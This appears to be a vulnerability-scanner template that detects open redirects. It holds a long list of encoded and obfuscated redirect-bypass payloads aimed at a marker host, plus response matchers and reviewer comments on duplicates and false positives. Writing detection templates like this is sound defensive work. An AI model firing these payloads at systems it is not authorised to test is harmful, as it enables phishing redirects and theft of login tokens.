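# Generic open-redirect detection template.
#
# Each payload is placed directly after the leading "/" of the request path.
# A finding is reported when the response is a 3xx redirect whose Location
# header points at the marker host "interact.sh". The marker is only matched
# as a string in the response header; no out-of-band callback is checked.
#
# For defenders: a match means the application copies request-controlled
# input into the Location header. The usual fix is to redirect only to
# relative paths or to an allow-list of known destinations.
id: open-redirect

info:
  name: Open Redirect - Detection
  author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
  # Was "low", which contradicted the classification below: a CVSS 3.1 base
  # score of 6.1 falls in the Medium band (4.0-6.9). Aligned so that
  # severity-filtered scans and reports agree with the stated vector.
  severity: medium
  description: An open redirect vulnerability was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  tags: redirect,generic

requests:
  # One raw GET per payload; {{redirect}} is replaced by each entry of the
  # "redirect" payload list and {{Hostname}} by the scan target.
  - raw:
      - |
        GET /{{redirect}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      # All entries are single-quoted, so backslashes are literal characters:
      # '\t' below is a backslash followed by "t", not a tab.
      redirect:
        - '%0a/interact.sh/'
        - '%0d/interact.sh/'
        - '%00/interact.sh/'
        - '%09/interact.sh/'
        - '%5C%5Cinteract.sh/%252e%252e%252f'
        - '%5Cinteract.sh'
        - '%5cinteract.sh/%2f%2e%2e'
        - '%5c{{RootURL}}interact.sh/%2f%2e%2e'
        - '../interact.sh'
        - '.interact.sh'
        - '/%5cinteract.sh'
        - '////\;@interact.sh'
        - '////interact.sh'
        - '///interact.sh'
        - '///interact.sh/%2f%2e%2e'
        - '///interact.sh@//'
        - '///{{RootURL}}interact.sh/%2f%2e%2e'
        - '//;@interact.sh'
        - '//\/interact.sh/'
        - '//\@interact.sh'
        - '//\interact.sh'
        - '//\tinteract.sh/'
        - '//interact.sh/%2F..'
        - '//interact.sh//'
        - '//%69%6e%74%65%72%61%63%74%2e%73%68'
        - '//interact.sh@//'
        - '//interact.sh\tinteract.sh/'
        - '//https://interact.sh@//'
        - '/<>//interact.sh'
        - '/\/\/interact.sh/'
        - '/\/interact.sh'
        - '/\interact.sh'
        - '/interact.sh'
        - '/interact.sh/%2F..'
        - '/interact.sh/'
        - '/interact.sh/..;/css'
        - '/https:interact.sh'
        - '/{{RootURL}}interact.sh/'
        - '/〱interact.sh'
        - '/〵interact.sh'
        - '/ゝinteract.sh'
        - '/ーinteract.sh'
        # NOTE(review): as shown here this entry is identical to the previous
        # one. Either it is a duplicate (one redundant request per target) or
        # a look-alike code point was lost in rendering - confirm against the
        # original file.
        - '/ーinteract.sh'
        - '<>//interact.sh'
        - '@interact.sh'
        - '@https://interact.sh'
        - '\/\/interact.sh/'
        - 'interact%E3%80%82sh'
        - 'interact.sh'
        - 'interact.sh/'
        - 'interact.sh//'
        - 'interact.sh;@'
        - 'https%3a%2f%2finteract.sh%2f'
        - 'https:%0a%0dinteract.sh'
        - 'https://%0a%0dinteract.sh'
        - 'https://%09/interact.sh'
        - 'https://%2f%2f.interact.sh/'
        - 'https://%3F.interact.sh/'
        - 'https://%5c%5c.interact.sh/'
        - 'https://%5cinteract.sh@'
        - 'https://%23.interact.sh/'
        - 'https://.interact.sh'
        - 'https://////interact.sh'
        - 'https:///interact.sh'
        - 'https:///interact.sh/%2e%2e'
        - 'https:///interact.sh/%2f%2e%2e'
        - 'https:///interact.sh@interact.sh/%2e%2e'
        - 'https:///interact.sh@interact.sh/%2f%2e%2e'
        - 'https://:80#@interact.sh/'
        - 'https://:80?@interact.sh/'
        - 'https://:@\@interact.sh'
        - 'https://:@interact.sh\@interact.sh'
        # NOTE(review): "WillBeReplaced.com" looks like a placeholder left
        # over from a payload list; presumably the target host was meant to
        # be substituted here - confirm.
        - 'https://:@interact.sh\@WillBeReplaced.com'
        - 'https://;@interact.sh'
        - 'https://\tinteract.sh/'
        - 'https://interact.sh/interact.sh'
        - 'https://interact.sh/https://interact.sh/'
        - 'https://www.\.interact.sh'
        - 'https:/\/\interact.sh'
        - 'https:/\interact.sh'
        - 'https:/interact.sh'
        - 'https:interact.sh'
        - '{{RootURL}}interact.sh'
        - '〱interact.sh'
        - '〵interact.sh'
        - 'ゝinteract.sh'
        - 'ーinteract.sh'
        # NOTE(review): identical to the previous entry as shown here; same
        # duplicate / lost-code-point question as the "/ー" pair above.
        - 'ーinteract.sh'
        # Sets many commonly used redirect parameter names in one request.
        - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'

    # Stop sending payloads to a target once one of them has matched.
    stop-at-first-match: true
    # Both matchers below must succeed for a finding to be reported.
    matchers-condition: and
    matchers:

      # Location header whose target host ends in the marker "interact.sh".
      # The trailing group rejects a "." right after the marker, so a target
      # such as "interact.sh.example.com" does not match.
      # NOTE(review): the scheme group (https://, //, /\\, /\) is optional,
      # so a relative "Location: interact.sh/..." also matches although it
      # resolves on the same origin. Requiring that group would avoid this
      # false positive; it needs re-validation against known-good samples.
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'  # https://regex101.com/r/ZDYhFh/1

      # The response must be a redirect; any one of these codes is enough.
      - type: status
        status:
          - 301
          - 302
          - 307
          - 308
        condition: or

# Enhanced by mp on 2022/10/14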